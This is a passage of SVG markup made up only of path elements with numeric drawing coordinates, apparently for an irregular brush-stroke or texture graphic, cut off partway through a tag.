d=\"M341.9,48c.8.2.9.5,4.6.5C349,48.4,345.8,48.1,341.9,48Z\"></path>\n        <path d=\"M349.2,48.3c1.9,0,3.8.1,5.7.1-.2-.2-.3-.4-.5-.6C349.1,47.7,348.3,48,349.2,48.3Z\"></path>\n        <path d=\"M38.1,40.6c-4.5-.1-7.1.3-2.3.5C34.4,40.7,39.5,40.9,38.1,40.6Z\"></path>\n        <path d=\"M294.9,46.7c6.2.2,3.3-.4,3.5-.8C291.1,45.8,297.4,46.3,294.9,46.7Z\"></path>\n        <path d=\"M354.2,47.7c1.4-.2,4.4-.3,5.1-.5C355.5,47.1,350.1,47.4,354.2,47.7Z\"></path>\n        <path d=\"M259.6,44.5c5.7-.1,11.3.5,15.6.4-4.3-.2,1.2-.2-.4-.4-4.4-.1-8.4.2-11.3-.3C264.2,44.4,258.1,44.1,259.6,44.5Z\"></path>\n        <path d=\"M376.3,46c-3.7,0,.8-.6-4.6-.5,1.9.4,1.2.4-2.3.5a32.29,32.29,0,0,0-4.5-.4c2.3.5,6.6.7,3.7,1.1,1.7.1,3.9.2,7.2.3,1.1-.4-5.5-.3-4.7-.7A34.73,34.73,0,0,0,376.3,46Z\"></path>\n        <path d=\"M299.8,44.3c-1.1.1-3.1.7,2,.7C298.8,44.6,303.5,44.6,299.8,44.3Z\"></path>\n        <path d=\"M278.3,43.6c6.4,0,4.8.5,8.9.6-.9-.7,4.9-1-1.3-1.4.6.4-2.1.4-.6.9C283.3,43.6,277.9,43.3,278.3,43.6Z\"></path>\n        <path d=\"M337.4,44.4c-1.1.1-3.1.9,2.2.9C335.9,44.9,341.5,44.7,337.4,44.4Z\"></path>\n        <path d=\"M240.3,43.1c6.1.2,6.3-.2,8-.4C242.3,42.5,242,42.8,240.3,43.1Z\"></path>\n        <path d=\"M4.7,37.3c-.1-.3-.5-.7-3.5-.8C-.4,36.6.4,37.2,4.7,37.3Z\"></path>\n        <path d=\"M330.9,41.8c-3.8-.2-6.4.5-.9.5C328.6,42,331.8,42.1,330.9,41.8Z\"></path>\n        <path d=\"M324.5,40.8c5.4.7-5.9.3-7.8.6,6.7.1,11.6.1,16.7,0C328.9,41.3,328.8,40.9,324.5,40.8Z\"></path>\n        <path d=\"M0,33.6H0V34a24.24,24.24,0,0,0,3.4.2C3.3,34,2.2,33.7,0,33.6Z\"></path>\n        <path d=\"M7.9,31.5c-3-.2-4.9,0-7.3-.4-1.6.4,0,.8,4.6.5.6.8-4,1.8,3.7,2.6-.5-.2,1.4-.2,1-.4-2.9-.1-5.6-1.3.3-1.3C10.6,32.1,4.7,31.7,7.9,31.5Z\"></path>\n        <path d=\"M281.8,39.6c.2.2-3.9,0-4,.1,3.8,0,3,.3,5.9.4C285.3,40,285.1,39.7,281.8,39.6Z\"></path>\n        <path d=\"M310.4,40.6c.4-.3-1.7-.5-6.1-.6C304.8,40.3,306.8,40.5,310.4,40.6Z\"></path>\n        <path d=\"M302.2,39.1c-4.7-.2-.8.3-5.5.1,1.5.2.5.6,4.7.7C303.3,39.7,302.4,39.4,302.2,39.1Z\"></path>\n        <path d=\"M297.4,38.4c-8.1-.3-1.5.7,1.7.4C297.5,38.8,297.4,38.6,297.4,38.4Z\"></path>\n        <path d=\"M335,38.5c-1.1.1-.9.6,3.4.7A9.43,9.43,0,0,0,335,38.5Z\"></path>\n        <path d=\"M360.1,38.7a25.51,25.51,0,0,1-4.1,0c3.9.5-1.2.7-5.3.3-1.4.3,9.8.5,10,.3C355.6,39.1,365.3,38.9,360.1,38.7Z\"></path>\n        <path d=\"M304.7,37.3c.3.4,4,.5,6.3.8,1.6-.1,7.1-.4.7-.7C312.9,38,307.5,37.4,304.7,37.3Z\"></path>\n        <path d=\"M344,37.6c.1.3,4.2.4,6.1.6-.2-.2.5-.2,1.1-.3C347.2,37.9,347.3,37.7,344,37.6Z\"></path>\n        <path d=\"M347.9,35.8c1.5.2.5.6,4.8.7C352.6,36.1,352.2,35.8,347.9,35.8Z\"></path>\n        <path d=\"M291.2,34.6c.3-.4,3.8-.7-1.9-.6C293,34.2,284.7,34.4,291.2,34.6Z\"></path>\n        <path d=\"M280.1,33c1.1.7,9,.2,11.1,0C286.2,32.7,286.4,33.5,280.1,33Z\"></path>\n        <path d=\"M347.2,33.5c-4.3-.1-2.6.3-3.8.5C347.9,34.1,347.8,33.8,347.2,33.5Z\"></path>\n        <path d=\"M331.3,32.8c-.1.1-.2.3-2.6.2-.2.3,2.3.4,6,.5A8.62,8.62,0,0,0,331.3,32.8Z\"></path>\n        <path d=\"M338,30.8c-2.1.5-2.6.5-7.8.6,3,.3,6.6,0,10,.3C335.4,31.3,345,31.2,338,30.8Z\"></path>\n        <path d=\"M117,114.4c-.1-.1,1-.1,1.2-.2-5-.1-1.5.5-.8.6,0-.2,3.5,0,2.5-.3A20.13,20.13,0,0,1,117,114.4Z\"></path>\n        <path d=\"M312.3,113.8c5.3.2,13.1.2,9.6-.1C321.3,114.2,312.6,113.3,312.3,113.8Z\"></path>\n        <path d=\"M227.3,108.8c-.7.6,1.8.9-1.8,1.2,2.8.1,2.1.3,5.9.4C227.6,109.9,235.6,109,227.3,108.8Z\"></path>\n        <path d=\"M345.3,108.6c-.1-.1-.3-.1-1.5-.1.7-.3,6.3-.1,6.6-.4-5.9-.2,1.2-.4-3.3-.6-2.1.2-.4.8-4.9.8.2-.2,2.1-.6-2.2-.9.4.3-.3.4-2.3.5-2.3-.4,2.9-.6-.7-.8-3.3.7-15,2.2-15.6,2.8,2-.1-.1-.6,5.2-.4-1.5.4-.2.3,4.4.3-.2.3-4.7.1-3.8.5,5.6,0,11.1.4,7.5.6,4.9,0,4.4-.2,8.5.2a17.18,17.18,0,0,1,5.2-.4,2.23,2.23,0,0,0,1.4,0c-1.5-.2-4.9-.3-6.1-.6,3-.5,2.4-1.3,6.9-1.6C346,108.2,348,108.6,345.3,108.6Z\"></path>\n        <path d=\"M407.8,111.8c-4.3.5-10.5-1.5-16.4-1.2,7.8.5,7.6,1.4,16.9,1.8C406.2,112,412.1,111.9,407.8,111.8Z\"></path>\n        <path d=\"M367.7,108.8c-5-.1,2.7-.3-1.7-.4-9.8.5-1.9,1.9-5.1,2.1,2.8,0,6.2.6,8.6.3C360.7,110.3,364.3,109,367.7,108.8Z\"></path>\n        <path d=\"M542.5,111.7c2.1.4-5,.5-.7.7a17.63,17.63,0,0,1,3.9-.4c.1.3-2.4.3,1.8.5C550.3,112.4,545.3,112,542.5,111.7Z\"></path>\n        <path d=\"M372.5,107.9c-9.1-.3-.3.9,1.9.6C371.3,108.4,373.4,108.1,372.5,107.9Z\"></path>\n        <path d=\"M347.2,104.4c3.2,1,2.4,1.5-5.3,1.8,3.6.1,5.6.3,6.1.6a52.3,52.3,0,0,0-5.6,0c.4.3,2.5.5,6.1.6,3.2-1,.7-1.9,4.5-2.8C348.6,104.7,348.6,104.2,347.2,104.4Z\"></path>\n        <path d=\"M263.7,36.5c6.8.2,2.1.2,1.8.5,3.1,0,4.6.2,4.5.4a15.72,15.72,0,0,0-3.8.5c4.9,0,5.8-.3,9.3-.4a49.56,49.56,0,0,1-7.4-.5c.2-.3,4.2-.2,5.3-.3-3.7-.1-6.1-.2-6-.5C265.6,36.2,263.2,36.2,263.7,36.5Z\"></path>\n        <path d=\"M369.4,60.3c-1-.3-2.2-.4.9-.5-1.3-.2-4.7-.3-7.3-.4C362,59.8,367.2,60,369.4,60.3Z\"></path>\n        <path d=\"M174.1,64.2c4.8.3.4,1.2,8.4,1.6-2.3.2-4.3-.2-7,0,8.7.6,2.6,1.2,8.8,2.1-3.6-1,5.3-2-4.1-3a14.92,14.92,0,0,0,2.2-.5C181,64.4,175.8,63.9,174.1,64.2Z\"></path>\n        <path d=\"M164.2,48.1c.2-.1.3-.1.4-.2C164,47.9,163.7,48,164.2,48.1Z\"></path>\n        <path d=\"M329.2,36.7c-4,.6-9,.4-17.6.5,3.3.4,5.3.1,7.2.3-3.7.1,2.7.5,3.4.7-1.2.8-4.4,1.3.4,2.1-2.5,0-5-.4-5.7-.1,5,0,1.6.5,6.1.6-2.3-.6-.8-.1,4.1,0-1-.3-2.6-.6-3.6-1,1.5-.1,5.2-.1,6.8-.2-4.3-.2,3.1-.1,1-.4-4.1-.2-3.6.1-7,0-.1-.1-1.3-.2-1.6-.3,3.3,0,6.5,0,6.7-.3a36.81,36.81,0,0,1-4.2-.1c2.6,0-3.8-1,3.8-.5.1-.2-1.9-.6,2.5-.4C327.4,37.2,336.5,37,329.2,36.7Z\"></path>\n        <path d=\"M403.3,73.5c-1.3-.4.4-.6,2.1-.7-4.5-.2-8.8-.4-11.7-.7A72.1,72.1,0,0,1,403.3,73.5Z\"></path>\n        <path d=\"M361.2,99.8c-4.4-.2-3,.7-2.3.6C360,100.2,362.6,100.2,361.2,99.8Z\"></path>\n        <path d=\"M310.5,99.1l-.4-.4c-3.5-.1-2.9.1-7,0-.5-.2.9-.5-3.2-.5a22.4,22.4,0,0,0,4.8.8C305.8,98.5,308.6,99.1,310.5,99.1Z\"></path>\n        <path d=\"M502.5,102.5c3.8-.5,1.4-.8,4.5-1.2-4.6,0-5.9,1-7.6,1.1C500.4,102.5,501.4,102.5,502.5,102.5Z\"></path>\n        <path d=\"M360.4,95.7c6.3.3,2.6-.4,8.2-.1,3.1.3-1,.5,2,.7-1.5-.4,9.4-.2,6.6-.4a78.39,78.39,0,0,1-8.8-.5c2.5-.1,2.2-.5.8-.6-2.4.1-1.2.9-6.6.4C363.6,95.5,358.5,95.3,360.4,95.7Z\"></path>\n        <path d=\"M120.1,89.5c.8-.1,2.8-.1,5.5-.1a29.61,29.61,0,0,0-4.7-.7C125.3,89.1,116,89.5,120.1,89.5Z\"></path>\n        <path d=\"M382.1,92c1.8.6.3.8,1.4,1.6,3,.2,7.5.6,7,0-1.6-.1-5.3-.3-6.2-.7,3.6-.3,3-1.2,1.2-1.8-2.2.2.3.1.4.4h-4.1c-3-.5-4.1-1.1-8.5-1.7-.1-.6,7.4-.1,7.6-.8-8.7-.3-7.1-.8-6.9-1.5,1.4,0,2.9.1,4.3.1-4-.5,1.6-.6-5.4-1.3h4.2c4,.3,7,2.2.1,1.7,5.1.9,9.1,1.5,4.8,2.3,2.5,0,5,.4,5.7.1-2.5-.5-3.2-1.1.1-1.4-7.8-.4-5-1.3.1-1.4,0,.3.2.5,3.3.6,4.2-.5,5.8-.7-1.3-1.4-1,.3,5,.9.9,1-2.1-.1-3.6-.3-4.5-.4,3.2-.2,1.8-.3.7-.7,6.2.2,3.5-.3,6.6-.4-3.1-.3-5.9.1-7.3-.4,1.3-.4-3.9-.9,1.8-1.2,2.3.2,2.9.5,6.2.7.4-.4-5.3-.4-4.9-.8,3.8.1,3.5-.2,3.9-.3-5.2-.7-1.8-1.5-8.8-2.2,2.6-.1,1.5-.5,3.6-.6-.2.2.7.4,3.2.5-5.6-.8,1.1-1.6-8.4-1.7-1-.5,7.9-.5,3.3-1-.3.1.1.2-1.2.2.1-.2-1.8-.3-1.8-.5,6.1,0-2.4-1.2,4.4-1.3-5.8,0-3-.5-6.2-.7-2.9.6-4.4,1.4-6.6,2-3.2-.8-2.7-1.2-3.2-2,2.4,0,6.1.8,5.8.2-9.1-.6.1-1.1-5.7-1.8-1.2.5.7,1.2-7.4,1,7.1.2-.9.4-.9.5,8.4.3,1.9,1,5.6,1.7-6-.1-2.8.2-.7.7-7-.3-4.2.3-8,.4,14.9,1,2.7,2-.3,2.3,1,0,4.1.3,5.5.4-.2.3-10,.1-5.1.5,1.4-.1.1-.4,3.9-.2.5.4,1.4.8-2,.8,2.2.1,4.6.3,4.6.5a13.78,13.78,0,0,1-4.7.4c1.2.1-1.7.7,1.3.5,9.1-1,8.4,2.6-2.4,2,1.1.3,6.1.4,6.3.8-3.4.1-3,.6-7.8.6.5.6,5,1.1-.2,1.3a54.5,54.5,0,0,0,7,0c1.7.3,4.8.7.7.8a27.48,27.48,0,0,0-7.3-.4c3.7.3.7,1.2-.3,1.2,1.5.4,4.5,0,7.1.2.9.3,4.1.5,6.3.8-1.3.1-2,.3-3.9.4-2.5-.2-3.5-.6-6.3-.8,3.1.5-2.2.5.9,1,3.4.2,5.1-.2,5.7.1-.6.5-3.9.5-2,.9,1.9,0,3.8.1,5.7.1.5-.5,0-.7.4-1.1,2.1,0,5.3.2,5.6,0C374.7,92.8,373.4,91.8,382.1,92Z\"></path>\n        <path d=\"M359.9,82.1h-.3a.19.19,0,0,0,.27,0h0Z\"></path>\n        <path d=\"M492,95.4c2.4,0,3.8.2,4.3.1-3.2-.1-.3-.6-4.7-.7C491.7,95.1,491.9,95.2,492,95.4Z\"></path>\n        <path d=\"M204.4,85.9a25.51,25.51,0,0,1-4.1,0c1.7.5-2.1.1-2.6.3,1.7.1,3.3.2,4.5.3-3.6-.2-3.2.5-.7.7-1.1-.3.2-.4,4-.2.7.5,1.6.5.8.9,5.9.1,2.8.7,7.7.8-5.6-.7-.2-1.4-11.5-2C200.6,86.3,209,86.3,204.4,85.9Z\"></path>\n        <path d=\"M392.2,89.3c-7,.2,5,1.2,0,1.5-4.8-.2,3.4-.3-3.1-.4,1,.2-1.1.6,2,.7C401.2,90.9,390.6,89.7,392.2,89.3Z\"></path>\n        <path d=\"M327.2,89.6c1.9,0,3.8.1,5.7.1C334.1,88.7,332.4,89.5,327.2,89.6Z\"></path>\n        <path d=\"M408.2,90.1c-1.8,0-7.3,1.1-1.9,1C403.4,90.8,409,90.5,408.2,90.1Z\"></path>\n        <path d=\"M442.5,89.7c.4.5-8.9,2.1,1.6,1.8C445.8,90.9,447.1,90.6,442.5,89.7Z\"></path>\n        <path d=\"M213.8,83.9c-7.4-.2-8.4-1.8-3.3-2.1,1.2.5.7.8,2.3,1-.1-.2,3.9,0,4.1-.1-.5-.2-1.3-.8-4.8-.8,4-.1.7-.5,2.1-.7-4.2,0-7.7-.5-4.6-.5a4,4,0,0,0,1.6.3c8.4-.9-5.6-2.6,5.4-3.4-2.1-.3-6.9-.1-7.2-.3,7.5-.3-3.4-1.6,5-2.2-1.7-.1-4-.1-4.4-.2,3.8,0,1.9-1.1-1-1.1,1.1-.4,4.7-.7,10.9-.3-6.1-.6,2.2-.5-.8-.9-2,.5-4.2-.4-8.8-.5-.5.6-1.6.7,2.4,1.1-9.9.9-2,2.7-5,3.8-3.5-.1-4.2.1-7.1-.2,3.9.5,6.1,1.2,2.7,1.5,4,.1,4.3.4,4.8.7-1.8,0-2.1-.2-4.4-.2.1.2.9.3,1.7.4a27.48,27.48,0,0,1-3-.2c2.3.4-3.4.5.6.7.6-.1,1.3-.2,2.6-.3-.1.2,1.8.3,1.8.5-5.5-.3-2.4.2-6.9.1,4.2.5,4.7.7,2.4,1.1a30.64,30.64,0,0,1,5.9.3c-6.8-.5-5.2.6-2,.9-1.9,0-3.2-.1-4.4-.2,1.7.8,1.5,1.4-2.5,1.9,6.3.1,4.7.8,3.7,1.1-1.7-.1-3.3-.2-4.4-.3,4.1.3,3.5-.4,1-.4,1.4.6-4.4.3-6.6.4a123.68,123.68,0,0,0,14.4.5c-.6-.3-3.8-1.4,1.9-1.1-4,0,2.3.2,1.7.4-.7.5.6.5-.7.9a32.42,32.42,0,0,1,4.4.3c0-.2,4.6,0,4-.2C211,85.4,220.4,84.6,213.8,83.9Z\"></path>\n        <path d=\"M438.3,89.6c-.4-.4-5.4-.5-7.7-.8C426.5,88.3,433.2,89.6,438.3,89.6Z\"></path>\n        <path d=\"M307.7,86.4c1.9,0,5.6.5,5.8.2-5-.5-.6-.9,3-1.4-3.5-.1-2.9.1-7,0,3.2-.1,2.1-.6-2.1-.8C308.2,85.2,310.1,85.7,307.7,86.4Z\"></path>\n        <path d=\"M175.7,80.1c-8.4-.3,2.3-.3-4.7-.7.6.2-1.7.2-2.5.3,7.9.4-1.4,1.1,4.1,1.5C171.9,80.7,172.1,80.3,175.7,80.1Z\"></path>\n        <path d=\"M178.7,80.4c.2.4-4.9-.3-4.1,0,1.3.1.5.3,2,.7,1.9,0,3.8.1,5.7.1C181.7,80.9,182.8,80.5,178.7,80.4Z\"></path>\n        <path d=\"M322.1,83.9c.5-.3,2.4.2,4.4.2,1.1-.4-5-.3-6.1-.6-.6-.3,7.3-.3,2.2-.6.7.3-4,0-4,.2C321.9,83.3,316.9,83.6,322.1,83.9Z\"></path>\n        <path d=\"M480.2,86.8c4.4.2,2.5-.2,6.9-.1l-.3-.3C483.1,86.4,482.9,86.7,480.2,86.8Z\"></path>\n        <path d=\"M328.7,81.8c-.3-.6,1.7-1.2-2.9-1.7,4.1.2,3.5-.1,7,0,.1-.2-1.8-.3-1.8-.5-7.9,0-7.7.2-13.9,0-.1.5,3.1.7-.6.9,10.1.3.8,1.2,4.1,1.5,3.5-.1-.2-.9,6.3-.7C330.5,81.6,324.6,81.6,328.7,81.8Z\"></path>\n        <path d=\"M180.8,76.4c-1.5-.4,1.3-.5.6-.9-6.1,0,1.9-.6-3.5-.8C174.3,75.1,177.2,75.9,180.8,76.4Z\"></path>\n        <path d=\"M317.6,75.6c-4.8-.1-1.9.4-3.7.6,1.5.3,4.6.4,4.9.8-5.9.1-.8.7-4.7,1,3.1,0,4.6.2,4.6.4a24.32,24.32,0,0,1-2.7,0c-.1-.2-1.3-.3-3.1-.4,1.4.5-.1.7-3.5.8,4.9-.1,1.2.4,4.5.4,3-.1-2.1-.9,5.1-.5-.3.1-1.8.2-1,.4,6.1.2,7.1.1,11.5.5,1.1-.5-5.1-.5-4.9-.9,5,.2,7.5.6,8.4.1-5.6-.1-8.6-.4-9.1-.9,6.8.4,1.9-.7,3.4-.9,3.6.1,4.6.3,5.6,0-3.7,0,.8-.6-4.6-.5-1.2.2,4.6.5.4.4-5.4-.6-3.9-1.5-2.9-1.7-9.2-.5-4.7,1.1-4.2,1.5a23.82,23.82,0,0,1-2.8-.1c.9-.3-2.5-.4-3.3-.6C315.7,75.9,318.1,75.9,317.6,75.6Z\"></path>\n        <path d=\"M125.9,72.3c5.2,0,3,.4,7.3.4,1.9-.1-1.1-.8-3.1-.4-.5-.2,6.5-.6-.7-.8,2.1.6-2.2.8-5.3.3-3.9,0,3,1.1-3.4.9,4.4.4,3.3.6,5,1C130.1,73.5,121.2,72.6,125.9,72.3Z\"></path>\n        <path d=\"M277.7,74.5c-2.1.2-9.2-.1-6.9.1,7.5.2,3.2,1,7.8.9C277.5,75.2,277,74.8,277.7,74.5Z\"></path>\n        <path d=\"M123.3,69.5c-5.4,0-14.7-.4-18.3-.3,7.2.2,7.8.9,13.6,1.2C114.9,69.7,119.3,69.6,123.3,69.5Z\"></path>\n        <path d=\"M314.7,72.3c-2.7.4,2.4,1.2-1.5,1.4,9.5.2,4.8.5,7.9,1,2.7.1,3-.1,5.6,0a5,5,0,0,1-.6-.7c-5.7-.2-2.4-.8-2.2-.9,1.9.1,2.9.2,5.8.2.3-.3-2.8-.3-1.9-.6-4.7-.2-.8.3-5.5.1.9-.3-2.2-.3-1.9-.6,7.9-.2,6.8-1.1,4.1-1.7C315.3,70.8,321.9,73.3,314.7,72.3Z\"></path>\n        <path d=\"M330.1,69.3c-.4.2-.1.5-3.9.3-3.2-1.2,2.4-1.7,7.2-2.9,5.5.3-1.8.8.8.9a21.29,21.29,0,0,1,4.3.1c-1.2-.6,1.8-.8-2.5-1.3-.1.1-.2.3-2.6.2-2-.4.6-.5-2-.7-6.5.1-7.7-.4-7.1-.8a23.81,23.81,0,0,1-4.7.1c1.8-.3-.8-.4.8-.6,2.6.1,4.1.3,3.9.5a9.45,9.45,0,0,1,2.8-.8c1.2-.4-3.8-.4-3.4-.7,5.4.1,7.3-.3,5-.7-6.9-.3-1.4.6-6.5.5-1.3-.5,5-.5.5-1a40.91,40.91,0,0,0,7,0c-4.2-1-.7-1.4-4.7-2.2,2.8.1,2.1.3,5.9.4-3.2-1.6-.5-3.1-5.5-4.7,5.1.2.8-.7,5.3-.4-5.9-.6,2.4-1-4.4-1.8,0,.1-1.7,0-1.5-.1,3.8,0,3,.3,5.9.4-1-.2,1.1-.6-2-.7,0,.1-.2.3-2.6.2-.3-.8,2.5-1.3,5.4-1.7,2.1.4,1.5.5-.8.6,2.7.1,3-.1,5.6,0-4.3-1.1-12.6-1.6-12.2-2.8-5.7-.3-3.1.2-6.8.2.3.3,4,.5,4.8.8-6,.6.6,2.1,1.1,2.9a36.35,36.35,0,0,0-5.9-.3c-.1.3,3,.4,4.7.7-7.2,0,.3,1.3-5.7,1.4.2-.4-8.6-.7-7.1-.2,10.6,0,10.4,2,10.6,2.5,3.6.1-.6.9,3.8,1.2-1.2.1-5.2-.1-4,.2,4.7,0,4.8.9,8.1,1.3-1.8,0-1.8.1-4.2,0,0-.3-.4-.6-4.7-.7,3.6.5,1.6,1.1.3,1.7a22.65,22.65,0,0,0-6.2-.5c4.1.2,0,.5.6.7,1.7,0,3.5.1,5.2.1-.6.3-.6.7,1.3.9-4.4-.2-2.8-.1-7.1-.2.2.3,2.7.4,2,.7-5.3-.2-6.1,0-5.2.4,3.4-.1,2.6-.2,8.1-.3.6.2,2.3.5.6.7-6.6-.6-.7.2-7.1-.2-1.3.5-3.8.9-5.7,1.4,5.4.2.5-.6,6.7-.3a4,4,0,0,1,.6.7c-3.3-.1-5.3-.1-5.5.1,13.5.2,2.9,2,13.6,2.8-2.2-.1-3.7-.2-5.9-.4.6.2-1.7.2-2.5.3,2.1.3,4.1-.1,5.8.2.6.5-.5.3-2.7,0-.7.4,7,.4,6.2.8-9-.3,1.2.6-5.1.5,6,.4.1.5.9,1,6.1.3-.3-.6,3.8-.5.2.1,2.6.2,3,.3,3.5,0,7.9,0,9.5-.2-9.3-.2,1.1-.3-3.4-.7a13.45,13.45,0,0,0,4.2,0C331.5,69.7,332.8,69.4,330.1,69.3Z\"></path>\n        <path d=\"M330.6,65.1c.6-.1-2.2-.6.9-.5,1.5,0,3.6,0,1.3-.1-1.9,0-3.8-.1-5.7-.1C329.5,64.6,325.9,64.8,330.6,65.1Z\"></path>\n        <path d=\"M330.6,55.6c.4,0,.9.1,1.4.1C331.5,55.7,331,55.6,330.6,55.6Z\"></path>\n        <path d=\"M334.3,70.9c-1.1.3-2.9-.2-4.3-.2a10.17,10.17,0,0,1-2.7,0c0,.5,5.6.3,6,.5-4.2,0-3.8.5-4.8.9C332.7,72,335.1,71.2,334.3,70.9Z\"></path>\n        <path d=\"M100.6,68.9c-4,.2,5,1.1,3.5.8C101.7,69.3,105.1,69.2,100.6,68.9Z\"></path>\n        <path d=\"M250.8,72.3c-1,.3,6.7,1,6.1.6C251,72.9,256.6,72.3,250.8,72.3Z\"></path>\n        <path d=\"M241.5,72.8c4.4.2,2.5-.2,6.9-.1-.9-.2,1.2-.5-1.9-.6C248.8,72.7,241.7,72.4,241.5,72.8Z\"></path>\n        <path d=\"M150.4,70.4c-2.5.6,13.8.6,7.1.2C157.5,71.1,153.1,70.4,150.4,70.4Z\"></path>\n        <path d=\"M128.7,69.2c-.9.1-3.5.7-.9.5.1-.4,5.5.4,5.6,0a26.2,26.2,0,0,1-2.8-.1C130.1,69.6,130.7,69.3,128.7,69.2Z\"></path>\n        <path d=\"M136.2,68.3c5.7.2-.1.3.6.7,4.6,0,4-.6,10.8-.4-2.8-.1-2.1-.3-5.9-.4.4.2-1.2.2-4.1.1A6.55,6.55,0,0,0,136.2,68.3Z\"></path>\n        <path d=\"M151.8,65.6c-1.2.3,3.1.2,3.4.4.3-.1.6-.1.9-.2C154.2,65.8,153,65.7,151.8,65.6Z\"></path>\n        <path d=\"M154.8,66.1c-2.7-.1-2.9-.4-5.7-.5-.9.4,4.7.8-.8.7-4.7-.5,2.5-1-3.9-1.3-3.6.5-1.6.3-.3,1.2,7.5.3,4.6.5,12.1,1.1C152.9,66.8,153.1,66.5,154.8,66.1Z\"></path>\n        <path d=\"M155.2,66c-.2,0-.3.1-.4.1a.79.79,0,0,0,.4-.1C155.2,66.1,155.3,66,155.2,66Z\"></path>\n        <path d=\"M337,70.8c4.1.4.7.5,3.5.8C343.3,71.4,340.9,70.9,337,70.8Z\"></path>\n        <path d=\"M504.7,75.1C513,74.8,500.8,73.7,504.7,75.1Z\"></path>\n        <path d=\"M111.9,64.4c3.7.6,5,1.3,11.2,1.7C117.3,65.5,118.7,64.6,111.9,64.4Z\"></path>\n        <path d=\"M478.4,72.1c-.9.6,2.7,1.4,6.9,1.6C481.2,73.3,483.5,72.5,478.4,72.1Z\"></path>\n        <path d=\"M142.5,62.8c-.8-.1-1.7-.3-3.1-.4-4,.2,2.4.5,4.7.7.8,1-2.8,1.1,1.7,1.9.9-.2,5.5.4,7.5.6,1.3-.6-9-1.2-1.3-1.4a22.48,22.48,0,0,0,5.9.4c-1.8-.2-3.8-.4-6.1-.6-1.4-.5,1.9-.6,3.5-.8-2.1-.1-5.2-.1-5.8-.2-.1-.2,9,0,3.9-.3-2.4.2-4.8-.6-9-.7,2.6.5-3.5.1-3.9.4,5.5.2-.1.4,4.8.7A7.34,7.34,0,0,0,142.5,62.8Z\"></path>\n        <path d=\"M401,70.9c4.1,0,4.3,0,8.5.2,1.6-.5-8.2-.3-7.6-.7.8,0,1.5-.1-.1-.1C397,70.4,403.4,70.7,401,70.9Z\"></path>\n        <path d=\"M250.3,67c3.4.1,1.8.5,4.7.7.9-.4-3.3-.8,1.8-1.2C252.5,66.4,253.3,66.9,250.3,67Z\"></path>\n        <path d=\"M115.9,64.2c.3-.4-1.2-.7-4.9-.9,2.2.4,4.2.5.6.7C113.5,64,114.7,64.1,115.9,64.2Z\"></path>\n        <path d=\"M102.2,62.9c-2.5.1.9.3,1.9.6-1,.1-8.3.1-3.9.3a19.39,19.39,0,0,1,4.1-.1c1.3-.1,1-.4,2.3-.5A36,36,0,0,1,102.2,62.9Z\"></path>\n        <path d=\"M414.4,70.3c-4.4-.2-5.1,0-8.4-.1.4-.2,2.7-.5-2-.7-1.8.1-.4.5-2.2.6,6,0,3.4.5,8.8.5C408.1,70.2,416.9,70.8,414.4,70.3Z\"></path>\n        <path d=\"M444.3,71.2c3.5-.1,2.2-.8.6-.9a15.43,15.43,0,0,1-2.8-.1C445.8,70.7,440.7,70.9,444.3,71.2Z\"></path>\n        <path d=\"M279.2,66.6c3.2-.3,5.2.4,7.4.5.7-.6-2.5-1.1.2-1.3C284.1,66,274.1,66,279.2,66.6Z\"></path>\n        <path d=\"M212.2,64.8a17.8,17.8,0,0,1-3-.2,26.15,26.15,0,0,0,2.8,0c-1.4,0-2.8-.1-4.2-.1,1.5.2,1,.6,3.4.7C210.7,65,212.6,65,212.2,64.8Z\"></path>\n        <path d=\"M113,62.5c-.5.2,3,.8,4.7.5-2.5-.1-3.4-.3-3.2-.5,1.9,0,3.2.1,4.4.2C118.2,62.2,115.3,62.4,113,62.5Z\"></path>\n        <path d=\"M45.6,60.2c4.9-.1,1.2.4,4.6.4-1.8-.5.5-1.3-4.3-1.7C47.3,59.4,47.9,59.8,45.6,60.2Z\"></path>\n        <path d=\"M133.7,60.7c-9.2-.3-9.2-.5-17.4-.8-1.9,0,.2.4-2.5.4-2.4-.2,1.9-.7-4.9-.9,4.7,1.1,1,1.7,4.8,2.3,0-.2,5.4.2,7.2.3-.5-.6,6.3-.6.3-1.2,5.2,0,10.4-.2,12.8.4a20.27,20.27,0,0,0-2.7,0c2.1,0,5.3.2,5.6,0C134.4,61.2,133.5,61,133.7,60.7Z\"></path>\n        <path d=\"M353.4,65.7c3.7.1,6.1.2,6,.5-.9-.1-5.7-.4-5.7-.1a33.79,33.79,0,0,1,4.5.3c0-.3,6.6,0,5.2-.4A79.44,79.44,0,0,0,353.4,65.7Z\"></path>\n        <path d=\"M149.1,61c7.9-.3-.5-.7-2.7-1.5,5.7-.3-.1-.6,3.4-.9a33.9,33.9,0,0,1-4.5-.3c0,.1-.2.3-2.6.2,1.1.3,3.4.6-2.4.5,1.9-.5-1.7.1-7.1-.2.4.2-.2.4,1.8.5,0-.7,3.5.7,5.8.2-3.6-.1-.4-.4,2.5-.3.3.6-5.3.6-6,1.1,7.6.2,6.9.9,3.7,1.1,3.1.3,2.7,0,5.8.2.4-.6,10.4-.2,13.4-.6C155.9,60.9,150.9,61.2,149.1,61Z\"></path>\n        <path d=\"M333.5,65.2c1.1.1,2.8.1,2.9.2-1.8,0-2.8.1-2.5.3,3.8.1,12,0,5.3-.3-.2.4-3.7.1-1.5-.1A34.6,34.6,0,0,0,333.5,65.2Z\"></path>\n        <path d=\"M252.7,63.7c-.6-.5,6.1-.3,6.6-.7-2.3-.3-3.3.1-4.4-.2-1.6-.5,4.4-.6,1.9-1a15.43,15.43,0,0,1-2.8-.1C255.1,62.4,251.8,63.2,252.7,63.7Z\"></path>\n        <path d=\"M252.7,63.7c.1.1.2.1.4.2C252.9,63.8,252.8,63.7,252.7,63.7Z\"></path>\n        <path d=\"M60.3,59.4c-1.9-.6.6-.7-2.4-1.1C58.8,58.8,52.7,59,60.3,59.4Z\"></path>\n        <path d=\"M48.1,58.3c3.4.1,3.5.4,6.1.6-3.1-.5,6.1-.4.7-.7-.6.1-1.3.2-2.5.3A16.74,16.74,0,0,0,48.1,58.3Z\"></path>\n        <path d=\"M343.9,64.4a40.66,40.66,0,0,0-8.1.3c3.4.1,3.5.4,6.1.6a17.85,17.85,0,0,0-3.4-.7C340.9,64.5,345.6,64.7,343.9,64.4Z\"></path>\n        <path d=\"M135.7,59.9c-1.7-.1-1.7-.2-1.7-.4-6,0-4.2-.5-8.9-.6C126,59.3,134.1,59.9,135.7,59.9Z\"></path>\n        <path 